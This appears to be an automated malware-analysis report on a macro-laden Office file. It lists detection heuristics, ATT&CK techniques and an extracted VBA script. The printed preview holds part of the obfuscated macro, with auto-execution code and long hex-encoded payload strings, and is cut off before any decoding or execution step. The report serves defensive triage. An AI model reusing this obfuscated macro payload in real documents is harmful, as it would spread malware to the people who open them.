MALICIOUS
264
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including Document_Open and Workbook_Open auto-execution macros, which is a strong indicator of malicious intent. The critical-severity heuristic for a Shell() call in VBA, combined with the presence of a VBA macro file named 'macros.bas', suggests that the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection further corroborates the malicious verdict.
Heuristics 8
-
ClamAV: Xls.Malware.Cwsp-6735643-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
Workbook_Open macro — high — OLE_VBA_WBOPEN: Workbook_Open macro
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or those where source extraction failed, so they are still flagged when no visible source is available.
-
Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks, such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body). This is the standard OOXML DrawingML namespace identifier, which also appears in benign Office files.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20157 bytes |
SHA-256: 3c03eeaedb6ec4a7a3e8d2bf76032769ed41b5c5000b13530df9f143e5eb786c
Detection
ClamAV (scan of this carved artifact):
No threats found
Obfuscation or payload:
likely
Carved artifact contains 69 long base64-like blob(s).
|
|||
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Public Sub J_EMZ() Dim K_J As String Dim YIH_MM As String Dim TJ_VTS As String TJ_VTS = "AFBD8484848484845184846B846184655CB384B0849D848484ABA984AD848484837575719BB684A6A084845584848584848D488484AF7F8484709B9165887F56B99F84BB848484594F8184848484BB848484B98484A384847DC18A7F59808E8484848446848190848484B75684849EBC84A" Dim WTT_OC As String WTT_OC = "284846B84848A8484844684798C9184B9845E846DB1846C846C84849EC08484848284848D84848459848461838484B08484844786848484845E84BF6484AC4FB7B584846C848484845D4F89A284848484847484848F848EA381C0848484B184788084535D964F84866D847A846C8484C284" Dim B_VO As String B_VO = "7CAC846A849C849F5D60818484B2848484608484846A848467846EAA9846844A84849C845B5984958484844A849A91846BB6BB84847457844847848684845FAC8484848C5B844C4A7D84788484878484848456BB8484845981844672848445A1C3945484B484848484B7B68B84518484C48" Dim KKT_RL As String KKT_RL = "486848484845A84844A7D84798487755460849A8484688484AF849090695F84848284848C8484798484848456848484B9846E848484A28484849984598453A084848484BB63668484A78484848484BD84849C83844675A48470978465B884847F80845084B44D848493846C84474C8486A9" Dim CML_SN As String CML_SN = "91846284B6AD848484A78484848473B28484B18461938484BB7C846E90508453A05F84A284B6849BC27F8152A4847E8484AC848475AEC28484847684849C8484845584B884A18459A884988484638484A74EA0708460AD84BBB7848484847EC365AB7184BB7A519B849A5F5E84897884798" Dim XSP_EW As String XSP_EW = "48484B967BE8462849B8484A2C38484848455B371844A84A1459492778384C45D84B384848984849E7D8484848484BC8484848469758484C48484BE9C84845C84B08A847884849784785A848CC184A9A9848484729F846A84BD84C27E8484B284847F84508884848EBD8460844884A759C4" Dim VT_Q As String VT_Q = 
"778BBA8456A2AF84A85E844A8484848484849E8484849D84AD849661BA84606A4A9C6B6E846E9A8484B584B9B8888491846C74848484AE84624B84845DB98474848478A5C38484A084849D5D848669804A849284AFAF5F845184C40D8384BE848484A284A377849A464D56B07F869B58798" Dim ZY_LI As String ZY_LI = "4BB93BA848984B75A53847584846C8484845F845F5D5AAD56847C846084B2B94E8448B262525D728462848484AA8084575B84BD849884A27D52C0AD848484586F8484848484C184848484849D848484AF84498484C084A0847A548484848F68C3845A848C769E84C48451A2848484BA8484" Dim XJ_DZT As String XJ_DZT = "608484597A848484845A8A84844C91849E7EAAC48487B49C848499848484AD73AFA1848481844884848484845F8484B184C1BA848484846B74846C7084878484AD8484848484C1848469847F8484C1848484AE4AA0845B8461B2B651B44976848C848484848484936D846B84859884569B8" Dim K_QJK As String K_QJK = "484848484848484A4C378847B6584A384844684745F84BA8F84845E84845D58AF84849E484684846E608484849DB184BB84959A758484846CB9848084A9B5846251A884848484466C4A849484848884848484848484847684508459BA84B8848468848384984D8484BFA684A38484848484" Dim A_P As String A_P = "9F6E844E84976C8483588598A8789B8484848460B5848584A08484F4494D847C8EAA8480845B845A8497845B7398848F84555884849495668484884CB8848090B3845281658455BD86A084849A898484848484845F928459B084628484B05B8B84778BC46E5F84848484AFA7848C845B848" Dim H_VR As String H_VR = "C9B9884576C848484B484BE845384B490B69B84849F8484848484AB816684848484849984789DB87452846E84848484B6AA84848498848484BA5C848484844E844D638C845C5E8484A99D846C84845B5884C0848484A1849CB6BA84738484A884938484B6B084BD4D84927B8484BA844D84" Dim HPQ_ZC As String HPQ_ZC = "70849CAA7B8484848461B684879D89B2849F8D55A04F84846B84B28484846A84B78473849A7684848484B58484B5849F568484C1848484A584678E4E8B9084845A847A6D847984B884A48477B58494847EABBE8484A7978484849F848469846984848484B74E8C5E8A717B847384A084865" Dim ZM_D As String ZM_D = 
"1847A718477849C66C0A184847F8453847CBF8484A27784847A6147844CA2A5908484848484849F608484A3778484648469C49B8A84488479C25AC3845F638484A584765B849F8484BAAB848547658984777D84849884849884A48484AC8484848446844E84849856848484BF847F758484" Dim V_C As String V_C = "5F845287B6846A848F8489848450C2756484BF78B37D74848468 ... (truncated) |
|||